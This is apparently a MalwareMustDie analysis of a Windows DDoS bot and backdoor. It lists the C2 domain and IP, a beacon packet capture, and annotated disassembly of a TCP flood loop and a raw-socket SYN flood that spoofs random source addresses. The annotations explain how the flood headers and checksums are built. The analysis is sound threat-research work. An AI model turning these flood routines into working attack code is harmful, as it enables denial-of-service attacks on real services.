- #MalwareMustDie! Chinese windows version DDOSer & Backdoor.
- CNC: 23.91.3.246 AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
- Sample: 0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a
- VT: https://www.virustotal.com/en/file/0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a/analysis/1409374344/
- Announce:
- https://twitter.com/MalwareMustDie/status/518672140896182272
- https://twitter.com/ochsenmeier/status/518680214566862848
- Verdicts:
- // ========================================
- // Backdoor to jiu40.mydns.iego.net (23.91.3.246)
- // Loc: 23.91.3.246|unassigned.psychz.net.|40676 | 23.91.0.0/19 | AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
- //
- // ========================================
- Pic Callback PoC: https://lh3.googleusercontent.com/-h5oOSXeoH_I/VDD3G-tXC9I/AAAAAAAARMw/b2zW6XcD7bM/h1900/00011.png
- 1 0.000000 x.x.x.x y.y.y.y DNS 80 Standard query 0x7084 A jiu40.mydns.iego.net
- 2 0.631257 y.y.y.y x.x.x.x DNS 96 Standard query response 0x7084 A 23.91.3.246
- 3 0.634134 x.x.x.x 23.91.3.246 TCP 62 2105→443 [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
- 4 0.634166 23.91.3.246 x.x.x.x TCP 62 443→2105 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1460 SACK_PERM=1
- 5 0.634457 x.x.x.x 23.91.3.246 TCP 60 2105→443 [ACK] Seq=1 Ack=1 Win=65535 Len=0
- 6 0.638676 x.x.x.x 23.91.3.246 SSL 1514 Continuation Data
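- Sent data (first payload on the port-443 session; it begins 01 00 00 00 rather than a TLS record header, so this is a custom protocol carried on TCP/443, not SSL/TLS as the capture tool labels it):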
- 00000000 01 00 00 00 27 24 20 20 51 52 53 57 51 56 20 20 ....*$ QRSWQV
- 00000010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000060 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000070 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000080 20 20 20 20 20 20 20 20 77 89 8e 84 8f 97 93 40 w......@
- 00000090 78 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 xp // <=== OS version: bytes 77 89 8e 84 8f 97 93 40 78 70 are "Windows XP" with 0x20 added to each byte
- 000000A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000C0 20 20 20 20 20 20 20 20 52 50 50 56 40 20 20 20 RPPV@
- 000000D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000100 20 20 20 20 20 20 20 20 52 50 51 54 4e 58 4e 52 RPQTNXNR
- 00000110 57 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 W
- 00000120 20 20 20 20 20 20 20 20 5d 2d 20 20 20 20 20 20 ]-
- // ========================================
- // DDoS PoC:
- // ========================================
- // sub_0x04013C0: TCP send-loop worker (stdcall, one 4-byte argument; see `retn 4`).
- // Copies 0x90 bytes from arg_0 to the stack, connects a TCP socket, then repeats
- // "fill buf with one repeated byte, send(s, buf, 0x800, 0), Sleep(10)" until dword_0x04110A0 == 1.
- // Returns 1 when connect() fails, 0 after the stop flag is seen.
- // NOTE(review): sub_0x04010E0(n) is not shown; it is used as if it returns a value below n (presumably pseudo-random) - confirm.
- // NOTE(review): sub_0x0401160(cp) is not shown; its result lands in the sockaddr address field, so presumably it resolves the host string - confirm.
- 0x04013C0 sub esp, 0A30h // reserve 0xA30 bytes of locals
- 0x04013C6 push esi
- 0x04013C7 mov esi, [esp+0A34h+arg_0] // esi = arg_0, source of the block copy below
- 0x04013CE push edi
- 0x04013CF lea eax, [esp+0A38h+WSAData]
- 0x04013D6 mov ecx, 24h // 0x24 dwords = 0x90 bytes
- 0x04013DB lea edi, [esp+0A38h+cp]
- 0x04013DF push eax // lpWSAData
- 0x04013E0 push 202h // wVersionRequested (Winsock 2.2)
- 0x04013E5 rep movsd // copy 0x90 bytes from arg_0 into local cp
- 0x04013E7 call ds:WSAStartup
- 0x04013ED xor ecx, ecx
- 0x04013EF mov edx, dword ptr [esp+0A38h+hostshort] // port value (IDA local "hostshort"; presumably inside the copied block - confirm)
- 0x04013F6 mov dword ptr [esp+0A38h+name.sa_family], ecx // zero the 16-byte sockaddr (this store and the three sa_data stores below)
- 0x04013FA mov dword ptr [esp+0A38h+name.sa_data+2], ecx
- 0x04013FE push edx // hostshort
- 0x04013FF mov dword ptr [esp+0A3Ch+name.sa_data+6], ecx
- 0x0401403 mov [esp+0A3Ch+name.sa_family], 2 // AF_INET
- 0x040140A mov dword ptr [esp+0A3Ch+name.sa_data+0Ah], ecx
- 0x040140E call ds:htons
- 0x0401414 mov word ptr [esp+0A38h+name.sa_data], ax // port in network byte order
- 0x0401419 lea eax, [esp+0A38h+cp]
- 0x040141D push eax // cp
- 0x040141E call sub_0x0401160
- 0x0401423 add esp, 4 // caller cleans the one argument (cdecl)
- 0x0401426 mov dword ptr [esp+0A38h+name.sa_data+2], eax // address field <- result of sub_0x0401160
- 0x040142A push 6 // protocol (IPPROTO_TCP)
- 0x040142C push 1 // type (SOCK_STREAM)
- 0x040142E push 2 // af (AF_INET)
- 0x0401430 call ds:socket
- 0x0401436 lea ecx, [esp+0A38h+name]
- 0x040143A mov esi, eax // esi = socket for the rest of the function
- 0x040143C push 10h // namelen
- 0x040143E push ecx // name
- 0x040143F push esi // s
- 0x0401440 call ds:connect
- 0x0401446 cmp eax, 0FFFFFFFFh // SOCKET_ERROR?
- 0x0401449 jnz short loc_0x0401462 // connected: go to the send loop
- // connect() failed: close the socket and return 1
- 0x040144B push esi // s
- 0x040144C call ds:closesocket
- 0x0401452 pop edi
- 0x0401453 mov eax, 1
- 0x0401458 pop esi
- 0x0401459 add esp, 0A30h
- 0x040145F retn 4
- 0x0401462 //
- 0x0401462
- 0x0401462 loc_0x0401462: // xref: sub_0x04013C0+89
- 0x0401462 push ebx
- 0x0401463 push ebp
- 0x0401464 mov ebp, ds:send // keep the send() pointer in ebp for the loop
- 0x040146A
- // Loop head: one iteration = one fill + one send() + Sleep(10)
- 0x040146A loc_0x040146A: // xref: sub_0x04013C0+10F
- 0x040146A push 400h
- 0x040146F call sub_0x04010E0
- 0x0401474 mov ebx, eax
- 0x0401476 push 1Ah
- 0x0401478 add ebx, 400h // fill length = sub_0x04010E0(0x400) + 0x400
- 0x040147E call sub_0x04010E0
- 0x0401483 add eax, 61h // fill byte = sub_0x04010E0(0x1A) + 'a'
- 0x0401486 mov ecx, ebx // ecx = fill length
- 0x0401488 mov bl, al
- 0x040148A mov edx, ecx // edx keeps the length for the tail bytes
- 0x040148C mov bh, bl // bx = fill byte twice
- 0x040148E lea edi, [esp+0A48h+buf]
- 0x0401495 mov eax, ebx
- 0x0401497 add esp, 8 // drop both sub_0x04010E0 arguments
- 0x040149A shl eax, 10h
- 0x040149D mov ax, bx // eax = fill byte replicated into all four bytes
- 0x04014A0 shr ecx, 2
- 0x04014A3 rep stosd // inlined memset: whole dwords
- 0x04014A5 mov ecx, edx
- 0x04014A7 and ecx, 3
- 0x04014AA rep stosb // inlined memset: remaining 0-3 bytes
- 0x04014AC cmp dword_0x04110A0, 1 // global stop flag
- 0x04014B3 jz short loc_0x04014D1
- // Every send() passes 0x800 bytes even though only the fill length above was rewritten this
- // iteration; the rest of buf is whatever the stack buffer already held.
- 0x04014B5 push 0 // flags
- 0x04014B7 lea eax, [esp+0A44h+buf]
- 0x04014BE push 800h // len
- 0x04014C3 push eax // buf
- 0x04014C4 push esi // s
- 0x04014C5 call ebp // send
- 0x04014C7 push 0Ah // dwMilliseconds
- 0x04014C9 call ds:Sleep
- 0x04014CF jmp short loc_0x040146A
- 0x04014D1 //
- 0x04014D1
- // Stop path: close the socket, terminate the thread whose handle is in dword_0x0413E14,
- // clear that handle and return 0.
- 0x04014D1 loc_0x04014D1: // xref: sub_0x04013C0+F3
- 0x04014D1 push esi // s
- 0x04014D2 call ds:closesocket
- 0x04014D8 mov ecx, dword_0x0413E14
- 0x04014DE push 0 // dwExitCode
- 0x04014E0 push ecx // hThread
- 0x04014E1 call ds:TerminateThread // forking stops..dunno what they call this in windozz.
- 0x04014E7 pop ebp
- 0x04014E8 pop ebx
- 0x04014E9 pop edi
- 0x04014EA mov dword_0x0413E14, 0
- 0x04014F4 xor eax, eax
- 0x04014F6 pop esi
- 0x04014F7 add esp, 0A30h
- 0x04014FD retn 4
- // ========================================
- // Scanner PoC, A lame .NET bruters..
- // ========================================
- // Function at 0x0401500 (named StartAddress in the xrefs; stdcall, one 4-byte argument - see `retn 4`).
- // Visible behaviour: copies 0x90 bytes from arg_0, opens a raw socket (AF_INET, SOCK_RAW, protocol 0xFF),
- // fills a 20-byte block at var_30 and a 20-byte block at var_0x044, and sendto()s the 40-byte result in
- // bursts of 15 with Sleep(10) between bursts, until dword_0x04110A0 == 1. Always returns 0.
- // NOTE(review): the field values (0x45, length 0x28, protocol 6; 0x50, flags 2, window 0x200) match an IPv4
- // header followed by a TCP header with only SYN set, with a new random source address per packet. No recv()
- // or reply handling appears in this listing - confirm against the full binary.
- // NOTE(review): sub_0x04010E0(n), sub_0x0401160(cp) and sub_0x0401000(buf, len) are not shown; they are used
- // as "value below n" (presumably pseudo-random), "host string -> address" and "16-bit checksum" - confirm.
- 0x0401500 push ebp
- 0x0401501 mov ebp, esp
- 0x0401503 push 0FFFFFFFFh
- 0x0401505 push offset unknown_libname_31 // Microsoft VisualC 210/net runtime
- 0x040150A mov eax, large fs:0
- 0x0401510 push eax
- 0x0401511 mov large fs:0, esp // link a new exception registration record at fs:0
- 0x0401518 sub esp, 168h
- 0x040151E push ebx
- 0x040151F push esi
- 0x0401520 mov esi, [ebp+arg_0] // esi = arg_0, source of the block copy below
- 0x0401523 push edi
- 0x0401524 mov [ebp+var_10], esp
- 0x0401527 xor ebx, ebx // ebx = 0, used as the constant zero below
- 0x0401529 mov ecx, 24h // 0x24 dwords = 0x90 bytes
- 0x040152E lea edi, [ebp+var_174]
- 0x0401534 push 1 // dwFlags
- 0x0401536 push ebx // g
- 0x0401537 rep movsd // copy 0x90 bytes from arg_0 into var_174
- 0x0401539 push ebx // lpProtocolInfo
- 0x040153A push 0FFh // protocol
- // The byte stores below build a stack string; the values are '1','9','2','.','1','6','8','.','1','.','8',0,
- // i.e. "192.168.1.8" if cp and var_1B..var_11 are contiguous (the IDA names suggest so).
- 0x040153F mov cl, 31h
- 0x0401541 mov al, 2Eh
- 0x0401543 mov dl, 38h
- 0x0401545 push 3 // type
- 0x0401547 push 2 // af
- 0x0401549 mov [ebp+cp], cl
- 0x040154C mov [ebp+var_1B], 39h
- 0x0401550 mov [ebp+var_1A], 32h
- 0x0401554 mov [ebp+var_19], al
- 0x0401557 mov [ebp+var_18], cl
- 0x040155A mov [ebp+var_17], 36h
- 0x040155E mov [ebp+var_16], dl
- 0x0401561 mov [ebp+var_15], al
- 0x0401564 mov [ebp+var_14], cl
- 0x0401567 mov [ebp+var_13], al
- 0x040156A mov [ebp+var_12], dl
- 0x040156D mov [ebp+var_11], bl
- 0x0401570 call ds:WSASocketA // WSASocketA(2, 3, 0xFF, NULL, 0, 1): raw IPv4 socket
- 0x0401576 cmp eax, 0FFFFFFFFh // INVALID_SOCKET?
- 0x0401579 mov [ebp+s], eax
- 0x040157C jz 0x0401687 // no raw socket: leave with return value 0
- // Destination sockaddr "to": family 2, port = htons(hostshort), address = sub_0x0401160(var_174)
- 0x0401582 mov eax, dword ptr [ebp+hostshort]
- 0x0401588 mov esi, ds:htons // esi = htons pointer for the calls below
- 0x040158E push eax // hostshort
- 0x040158F mov [ebp+to.sa_family], 2
- 0x0401595 call esi // htons
- 0x0401597 lea ecx, [ebp+var_174]
- 0x040159D mov word ptr [ebp+to.sa_data], ax
- 0x04015A1 push ecx // cp
- 0x04015A2 call sub_0x0401160
- 0x04015A7 add esp, 4
- 0x04015AA mov dword ptr [ebp+to.sa_data+2], eax
- // First 20-byte block, var_30..: 0x45, 0, htons(0x28), 1, 0x40, sub_0x04010E0(0x100), 6, 0, ...
- 0x04015AD mov [ebp+var_30], 45h
- 0x04015B1 mov [ebp+var_2F], bl
- 0x04015B4 push 28h // hostshort
- 0x04015B6 call esi // htons
- 0x04015B8 push 100h
- 0x04015BD mov [ebp+var_2E], ax // 0x28 = 40, the length later passed to sendto
- 0x04015C1 mov [ebp+var_2C], 1
- 0x04015C7 mov [ebp+var_2A], 40h
- 0x04015CD call sub_0x04010E0
- 0x04015D2 add esp, 4
- 0x04015D5 lea edx, [ebp+cp]
- 0x04015D8 mov [ebp+var_28], al // low byte of sub_0x04010E0(0x100)
- 0x04015DB mov [ebp+var_27], 6
- 0x04015DF push edx // cp
- 0x04015E0 mov [ebp+var_26], bx // zeroed here; written with the sub_0x0401000 result at 0x0401887
- 0x04015E4 call ds:inet_addr
- 0x04015EA mov edi, eax // edi = inet_addr(cp)
- 0x04015EC lea eax, [ebp+var_174]
- 0x04015F2 push eax // cp
- 0x04015F3 call sub_0x0401160
- 0x04015F8 push 0EA60h
- 0x04015FD mov [ebp+var_20], eax // same value as to.sa_data+2
- 0x0401600 call sub_0x04010E0
- 0x0401605 add esp, 8 // drops the sub_0x0401160 and sub_0x04010E0 arguments together
- 0x0401608 inc eax
- // Second 20-byte block, var_0x044..: htons(sub_0x04010E0(0xEA60)+1), htons(hostshort),
- // htonl(sub_0x04010E0(0x35A4E900)+1), 0, 0x50, 2, htons(0x200), 0, 0
- 0x0401609 push eax // hostshort
- 0x040160A call esi // htons
- 0x040160C mov ecx, dword ptr [ebp+hostshort]
- 0x0401612 mov [ebp+var_0x044], ax
- 0x0401616 push ecx // hostshort
- 0x0401617 call esi // htons
- 0x0401619 push 35A4E900h
- 0x040161E mov [ebp+var_0x042], ax
- 0x0401622 call sub_0x04010E0
- 0x0401627 add esp, 4
- 0x040162A inc eax
- 0x040162B push eax // hostlong
- 0x040162C call ds:htonl
- 0x0401632 push 200h // hostshort
- 0x0401637 mov [ebp+var_0x040], eax
- 0x040163A mov [ebp+var_3C], ebx
- 0x040163D mov [ebp+var_38], 50h
- 0x0401641 mov [ebp+var_37], 2
- 0x0401645 call esi // htons
- 0x0401647 mov edx, [ebp+var_20]
- 0x040164A push 14h // hostshort
- 0x040164C mov [ebp+var_36], ax
- 0x0401650 mov [ebp+var_34], bx // zeroed here; written with the sub_0x0401000 result at 0x040180E
- 0x0401654 mov [ebp+var_32], bx
- // 12-byte block var_50 / var_0x04C / var_0x048: inet_addr(cp), var_20, 0, 6, htons(0x14).
- // NOTE(review): this matches a TCP checksum pseudo-header (source, destination, zero, protocol, length) - confirm.
- 0x0401658 mov [ebp+var_50], edi
- 0x040165B mov [ebp+var_0x04C], edx
- 0x040165E mov byte ptr [ebp+var_0x048], bl
- 0x0401661 mov byte ptr [ebp+var_0x048+1], 6
- 0x0401665 call esi // htons
- 0x0401667 mov word ptr [ebp+var_0x048+2], ax
- 0x040166B
- // Outer loop head: check the global stop flag before each burst
- 0x040166B 0x040166B: // xref: StartAddress+407
- 0x040166B cmp dword_0x04110A0, 1
- 0x0401672 jnz short 0x040169C // flag not set: start a burst
- // Stop requested: TerminateThread(dword_0x0413E10, 0), clear the stored handle, fall into the exit path
- 0x0401674 mov eax, dword_0x0413E10
- 0x0401679 push ebx // dwExitCode
- 0x040167A push eax // hThread
- 0x040167B call ds:TerminateThread
- 0x0401681 mov dword_0x0413E10, ebx
- 0x0401687
- // Common exit: restore the previous fs:0 record from var_C and return 0
- 0x0401687 0x0401687: // xref: StartAddress+7C
- 0x0401687 mov ecx, [ebp+var_C]
- 0x040168A pop edi
- 0x040168B pop esi
- 0x040168C xor eax, eax
- 0x040168E mov large fs:0, ecx
- 0x0401695 pop ebx
- 0x0401696 mov esp, ebp
- 0x0401698 pop ebp
- 0x0401699 retn 4
- 0x040169C //
- 0x040169C
- 0x040169C 0x040169C: // xref: StartAddress+172
- 0x040169C mov [ebp+arg_0], ebx // arg_0 slot reused as the per-burst counter, starts at 0
- 0x040169F
- 0x040169F 0x040169F: // xref: StartAddress+3FA
- 0x040169F cmp [ebp+arg_0], 0Fh
- 0x04016A3 jge 0x04018FF // 15 packets sent: Sleep, then re-check the stop flag
- // Four values, each sub_0x04010E0(0xFA)+1, are pushed as the wsprintfA arguments
- 0x04016A9 push 0FAh
- 0x04016AE call sub_0x04010E0
- 0x04016B3 add esp, 4
- 0x04016B6 inc eax
- 0x04016B7 push eax
- 0x04016B8 push 0FAh
- 0x04016BD call sub_0x04010E0
- 0x04016C2 add esp, 4
- 0x04016C5 inc eax
- 0x04016C6 push eax
- 0x04016C7 push 0FAh
- 0x04016CC call sub_0x04010E0
- 0x04016D1 add esp, 4
- 0x04016D4 inc eax
- 0x04016D5 push eax
- 0x04016D6 push 0FAh
- 0x04016DB call sub_0x04010E0
- 0x04016E0 add esp, 4
- 0x04016E3 inc eax
- 0x04016E4 lea ecx, [ebp+cp]
- 0x04016E7 push eax
- 0x04016E8 push offset aD_D_D_D // "%d.%d.%d.%d"
- 0x04016ED push ecx // LPSTR
- 0x04016EE call wsprintfA // cp = dotted quad built from the four values
- 0x04016F4 push 100h
- 0x04016F9 mov [ebp+var_26], bx // reset to 0 before it is recomputed
- 0x04016FD call sub_0x04010E0
- 0x0401702 add esp, 1Ch // 0x18 for the six wsprintfA arguments + 4 for the 0x100 argument
- 0x0401705 lea edx, [ebp+cp]
- 0x0401708 mov [ebp+var_28], al
- 0x040170B push edx // cp
- 0x040170C call ds:inet_addr
- 0x0401712 mov edi, eax // edi = inet_addr of the freshly generated dotted quad
- 0x0401714 push 0EA60h
- 0x0401719 mov [ebp+var_24], edi // new value for the address field at var_24
- 0x040171C mov [ebp+var_34], bx // reset to 0 before it is recomputed
- 0x0401720 call sub_0x04010E0
- 0x0401725 add esp, 4
- 0x0401728 inc eax
- 0x0401729 push eax // hostshort
- 0x040172A call esi // htons
- 0x040172C push 35A4E900h
- 0x0401731 mov [ebp+var_0x044], ax // new 16-bit value at the start of the second block
- 0x0401735 call sub_0x04010E0
- 0x040173A add esp, 4
- 0x040173D inc eax
- 0x040173E push eax // hostlong
- 0x040173F call ds:htonl
- 0x0401745 mov [ebp+var_0x040], eax // new 32-bit value at var_0x040
- // From here to 0x04018AA every step ends in __CxxThrowException(&local, unk_0x040FE08); the two-instruction
- // stub after each call (xref'd from .rdata) returns the address of the next step.
- // NOTE(review): this looks like compiled throw/catch pairs used as straight-line control flow; the stored
- // values (0x32, 0x25D, 0x30C, 0x4E, 0x293, 0xD2, 0x1C2) are not read anywhere in this listing - confirm.
- 0x0401748 lea eax, [ebp+var_64]
- 0x040174B push offset unk_0x040FE08
- 0x0401750 push eax
- 0x0401751 mov [ebp+var_50], edi // 12-byte block gets the new address too
- 0x0401754 mov [ebp+var_0x04], ebx
- 0x0401757 mov [ebp+var_64], 32h
- 0x040175E call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x0401763 //
- 0x0401763
- 0x0401763 0x0401763: // xref: .rdata:stru_0x040FFC0
- 0x0401763 mov eax, offset 0x0401769
- 0x0401768 retn
- 0x0401769 //
- 0x0401769
- 0x0401769 0x0401769: // xref: StartAddress:0x0401763
- 0x0401769 lea ecx, [ebp+var_5C]
- 0x040176C push offset unk_0x040FE08
- 0x0401771 push ecx
- 0x0401772 mov [ebp+var_0x04], 2
- 0x0401779 mov [ebp+var_5C], 25Dh
- 0x0401780 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x0401785 //
- 0x0401785
- 0x0401785 0x0401785: // xref: .rdata:stru_0x040FFD0
- 0x0401785 mov eax, offset 0x040178B
- 0x040178A retn
- 0x040178B //
- 0x040178B
- 0x040178B 0x040178B: // xref: StartAddress:0x0401785
- 0x040178B lea edx, [ebp+var_58]
- 0x040178E push offset unk_0x040FE08
- 0x0401793 push edx
- 0x0401794 mov [ebp+var_0x04], 4
- 0x040179B mov [ebp+var_58], 30Ch
- 0x04017A2 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04017A7 //
- 0x04017A7
- 0x04017A7 0x04017A7: // xref: .rdata:stru_0x040FFE0
- 0x04017A7 mov eax, offset 0x04017AD
- 0x04017AC retn
- 0x04017AD //
- 0x04017AD
- // Copy the 12-byte block (var_50, var_0x04C, var_0x048) to buf, var_E0, var_DC
- 0x04017AD 0x04017AD: // xref: StartAddress:0x04017A7
- 0x04017AD mov eax, [ebp+var_50]
- 0x04017B0 mov ecx, [ebp+var_0x04C]
- 0x04017B3 mov edx, [ebp+var_0x048]
- 0x04017B6 mov dword ptr [ebp+buf], eax
- 0x04017BC lea eax, [ebp+var_70]
- 0x04017BF push offset unk_0x040FE08
- 0x04017C4 push eax
- 0x04017C5 mov [ebp+var_E0], ecx
- 0x04017CB mov [ebp+var_DC], edx
- 0x04017D1 mov [ebp+var_0x04], 6
- 0x04017D8 mov [ebp+var_70], 4Eh
- 0x04017DF call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04017E4 //
- 0x04017E4
- 0x04017E4 0x04017E4: // xref: .rdata:stru_0x040FFF0
- 0x04017E4 mov eax, offset 0x04017EA
- 0x04017E9 retn
- 0x04017EA //
- 0x04017EA
- // Append the second 20-byte block at var_D8, then var_34 = sub_0x0401000(buf, 0x20)
- 0x04017EA 0x04017EA: // xref: StartAddress:0x04017E4
- 0x04017EA mov ecx, 5 // 5 dwords = 20 bytes
- 0x04017EF lea esi, [ebp+var_0x044]
- 0x04017F2 lea edi, [ebp+var_D8]
- 0x04017F8 push 20h
- 0x04017FA rep movsd
- 0x04017FC lea ecx, [ebp+buf]
- 0x0401802 push ecx
- 0x0401803 call sub_0x0401000
- 0x0401808 add esp, 8
- 0x040180B lea edx, [ebp+var_6C]
- 0x040180E mov [ebp+var_34], ax // 16-bit result over 0x20 bytes (12 + 20) stored in the second block
- 0x0401812 mov [ebp+var_0x04], 8
- 0x0401819 push offset unk_0x040FE08
- 0x040181E push edx
- 0x040181F mov [ebp+var_6C], 293h
- 0x0401826 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x040182B //
- 0x040182B
- 0x040182B 0x040182B: // xref: .rdata:stru_0x0410000
- 0x040182B mov eax, offset 0x0401831
- 0x0401830 retn
- 0x0401831 //
- 0x0401831
- // Overwrite buf with the first 20-byte block (var_30)
- 0x0401831 0x0401831: // xref: StartAddress:0x040182B
- 0x0401831 mov ecx, 5
- 0x0401836 lea esi, [ebp+var_30]
- 0x0401839 lea edi, [ebp+buf]
- 0x040183F lea eax, [ebp+var_60]
- 0x0401842 push offset unk_0x040FE08
- 0x0401847 push eax
- 0x0401848 rep movsd
- 0x040184A mov [ebp+var_0x04], 0Ah
- 0x0401851 mov [ebp+var_60], 0D2h
- 0x0401858 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x040185D //
- 0x040185D
- 0x040185D 0x040185D: // xref: .rdata:stru_0x0410010
- 0x040185D mov eax, offset 0x0401863
- 0x0401862 retn
- 0x0401863 //
- 0x0401863
- // Append the second block at var_D0, then var_26 = sub_0x0401000(buf, 0x28)
- 0x0401863 0x0401863: // xref: StartAddress:0x040185D
- 0x0401863 mov ecx, 5
- 0x0401868 lea esi, [ebp+var_0x044]
- 0x040186B lea edi, [ebp+var_D0]
- 0x0401871 push 28h
- 0x0401873 rep movsd
- 0x0401875 lea ecx, [ebp+buf]
- 0x040187B push ecx
- 0x040187C call sub_0x0401000
- 0x0401881 add esp, 8
- 0x0401884 lea edx, [ebp+var_68]
- 0x0401887 mov [ebp+var_26], ax // 16-bit result over all 0x28 bytes stored in the first block
- 0x040188B mov [ebp+var_0x04], 0Ch
- 0x0401892 push offset unk_0x040FE08
- 0x0401897 push edx
- 0x0401898 mov [ebp+var_68], 1C2h
- 0x040189F call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04018A4 //
- 0x04018A4
- 0x04018A4 0x04018A4: // xref: .rdata:stru_0x0410020
- 0x04018A4 mov eax, offset 0x04018AA
- 0x04018A9 retn
- 0x04018AA //
- 0x04018AA
- // Final assembly: buf = first block (now with var_26 set) + second block, then
- // sendto(s, buf, 0x28, 0, &to, 0x10)
- 0x04018AA 0x04018AA: // xref: StartAddress:0x04018A4
- 0x04018AA mov ecx, 5
- 0x04018AF lea esi, [ebp+var_30]
- 0x04018B2 lea edi, [ebp+buf]
- 0x04018B8 mov edx, [ebp+s]
- 0x04018BB rep movsd
- 0x04018BD mov ecx, 5
- 0x04018C2 lea esi, [ebp+var_0x044]
- 0x04018C5 lea edi, [ebp+var_D0]
- 0x04018CB lea eax, [ebp+to]
- 0x04018CE rep movsd
- 0x04018D0 push 10h // tolen
- 0x04018D2 xor ebx, ebx // ebx back to 0 for the next iteration
- 0x04018D4 push eax // to
- 0x04018D5 push ebx // flags
- 0x04018D6 lea ecx, [ebp+buf]
- 0x04018DC push 28h // len
- 0x04018DE push ecx // buf
- 0x04018DF push edx // s
- 0x04018E0 mov [ebp+var_0x04], 0FFFFFFFFh
- 0x04018E7 call ds:sendto
- 0x04018ED mov eax, [ebp+arg_0]
- 0x04018F0 mov esi, ds:htons // esi was used as a copy source above; reload the htons pointer
- 0x04018F6 inc eax
- 0x04018F7 mov [ebp+arg_0], eax // per-burst counter + 1
- 0x04018FA jmp 0x040169F
- 0x04018FF
- 0x04018FF 0x04018FF: // xref: StartAddress+1A3
- 0x04018FF push 0Ah // dwMilliseconds
- 0x0401901 call ds:Sleep
- 0x0401907 jmp 0x040166B
- ----
- #MalwareMustDie!